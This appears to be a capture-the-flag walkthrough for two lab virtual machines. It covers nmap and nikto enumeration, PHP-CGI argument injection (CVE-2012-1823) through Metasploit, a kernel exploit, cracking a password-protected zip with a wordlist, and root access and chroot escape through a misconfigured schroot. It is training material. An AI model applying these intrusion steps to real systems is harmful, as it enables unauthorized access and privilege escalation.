Download links for the machine images:
We recommend running the machine images inside of VirtualBox, which is the supervisor that we used to create the challenges. Installing and running these images should be trivial.
The credentials for accesing the machines are (updated on 22nd of August, 2014):
- ctf02-01: ubuntu with 4;9M3kr%5jn0otCca>]eVO.,Vog>ml7[
- ctf02-02: root with 7m[Y5TNz’)6`|@p:JLP”A\#M*6<4J~lz
ctf02-01, IP address: 10.200.0.4
Enumeration:
nmap -sS -p 1-65535 10.200.0.4
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 12:39 EEST
Nmap scan report for 10.200.0.4
Host is up (0.0012s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:DF:18:9D (Cadmus Computer Systems)Nmap done: 1 IP address (1 host up) scanned in 8.37 seconds
Scan the HTTP server:
nikto -host 10.200.0.4 -C all
– Nikto v2.1.6
—————————————————————————
+ Target IP: 10.200.0.4
+ Target Hostname: 10.200.0.4
+ Target Port: 80
+ Start Time: 2014-08-13 12:41:17 (GMT3)
—————————————————————————
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: /phpMyAdmin-4.2.6-all-languages
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ /cgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 284076, size: 5108, mtime: Tue Aug 28 13:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827
+ 22354 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2014-08-13 12:42:51 (GMT3) (94 seconds)
—————————————————————————
+ 1 host(s) tested
The most interesting information comes from the line that states, “+ OSVDB-: /?-s allows the retrieval of the PHP source code, making it vulnerable to CVE-2012-1823.” This means that the PHP is vulnerable to argument injection, which can be used to achieve remote code execution.
Image may be NSFW.
Clik here to view.
Metasploit’s php_cgi_arg_injection module is appropriate for getting a foothold on this machine.
Image may be NSFW.
Clik here to view.
Side note: /cgi-bin is actually linked to /usr/bin. The above vulnerability is not required to gain a foothold. You do have to get a little bit creative in order to exploit the machine via this method, but I’m leaving this out as homework.
As the machine runs the 3.2.0-23-generic kernel, you can find an exploit for it on exploit-db.com.
From there, getting to root is really easy given the fact that a gcc is already installed for your convenience.
Image may be NSFW.
Clik here to view.
ctf02-02, IP address: 10.200.0.6
This machine was a pain in the ass for most of you but you may learn some new things while trying to take it down.
Enumeration:
nmap -sS -p 1-65535 10.200.0.6
Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 13:48 EEST
Nmap scan report for 10.200.0.6
Host is up (0.00072s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:48:04:9C (Cadmus Computer Systems)Nmap done: 1 IP address (1 host up) scanned in 9.19 seconds
Using scanners like nikto doesn’t really help on this target:
nikto -host 10.200.0.6 -C all
– Nikto v2.1.6
—————————————————————————
+ Target IP: 10.200.0.6
+ Target Hostname: 10.200.0.6
+ Target Port: 80
+ Start Time: 2014-08-13 13:50:18 (GMT3)
—————————————————————————
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 262222, size: 150, mtime: Fri Jul 25 23:31:47 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 22354 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2014-08-13 13:51:30 (GMT3) (72 seconds)
—————————————————————————
+ 1 host(s) tested
Moving forward, there are a couple of viable methods that we can use. They both take about the same amount of time.
First method: read the source code of the index, then go to the directory indicated by the served image:
Image may be NSFW.
Clik here to view.
The second method is to use DirBuster with a directory list like /usr/share/dirbuster/wordlists/directory-list-1.0.txt. It should quickly log interesting information such as:
dirbuster
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: /cgi-bin/ – 403
Dir found: / – 200
Dir found: /i-can-has/ – 200
File found: /i-can-has/credentials.zip – 200
Dir found: /icons/ – 403
Anyway, the result is the same:
Image may be NSFW.
Clik here to view.
From here, getting something useful will take some time, but it isn’t impossible:
wget http://10.200.0.6/i-can-has/credentials.zip
–2014-08-13 13:59:51– http://10.200.0.6/i-can-has/credentials.zip
Connecting to 10.200.0.6:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 248 [application/zip]
Saving to: `credentials.zip’100%[=============================================================>] 248 –.-K/s in 0s
2014-08-13 13:59:51 (31.7 MB/s) – `credentials.zip’ saved [248/248]
unzip credentials.zip
Archive: credentials.zip
[credentials.zip] credentials.txt password:
skipping: credentials.txt incorrect passwordfcrackzip –dictionary –use-unzip –init-password /usr/share/wordlists/rockyou.txt credentials.zip
PASSWORD FOUND!!!!: pw == arisha786
unzip credentials.zip
Archive: credentials.zip
[credentials.zip] credentials.txt password:
extracting: credentials.txtcat credentials.txt
foobar:r+:/,3{0WU<5%”OxDa=c=E)7%JMI35″R
This challenge also tries to prove a point about using a weak password to protect your password vault.
With this new information, getting a foothold is easy:
Image may be NSFW.
Clik here to view.
However, moving on from this point may not be so easy. Some of you tried to hit the machine with every exploit that’s even remotely close to what the machine is actually running. Some of you even used 32-bit exploits, even though the machine runs a 64-bit build.
During the competition I gave you an important hint: stop doing what you’re doing and start enumerating. Those who listened, moved to the next step.
Here’s what most of you missed on a fully patched machine: the binaries with the setuid attribute.
Image may be NSFW.
Clik here to view.
This enumeration shows a couple of important bits: the presence of /usr/bin/schroot and the presence of another userland in /srv/buildd. A little bit of RTFM on schroot (man schroot, man schroot.conf) reveals the next clue:
cat /etc/schroot/schroot.conf
[buildd]
description=buildd
aliases=buildd
type=directory
directory=/srv/buildd
root-groups=foobar
personality=linux
The interesting line from the above config file is: root-groups=foobar. The manual explains why:
root-users=user1,user2,…
A comma-separated list of users which are allowed password-less root access to the
chroot. If empty or omitted, no users will be allowed root access without a pass‐
word (but if a user or a group they belong to is in users or groups, respectively,
they may gain access with a password). See the section “Security” below.
You just need to read the help of schroot to figure out that the minimum set of options for getting into the chroot as root is: schroot -u root -c buildd.
Image may be NSFW.
Clik here to view.
The challenge isn’t over yet, as you need to escape the chroot. The easiest method is to set the setuid attribute to a binary owned by root inside the chroot, then execute that binary from the host machine:
Image may be NSFW.
Clik here to view.
As the userland from inside the chroot is 32-bit while the host is 64-bit, you need to copy the binary from the host to a location which is available to the chroot.
You can pwn a chroot the hard way by doing a chroot evasion. I am leaving this part as homework. Doing a file transfer or editing files from inside the chroot isn’t covered by the usual suspects, so you might learn something new if you try this.
Image may be NSFW.Clik here to view.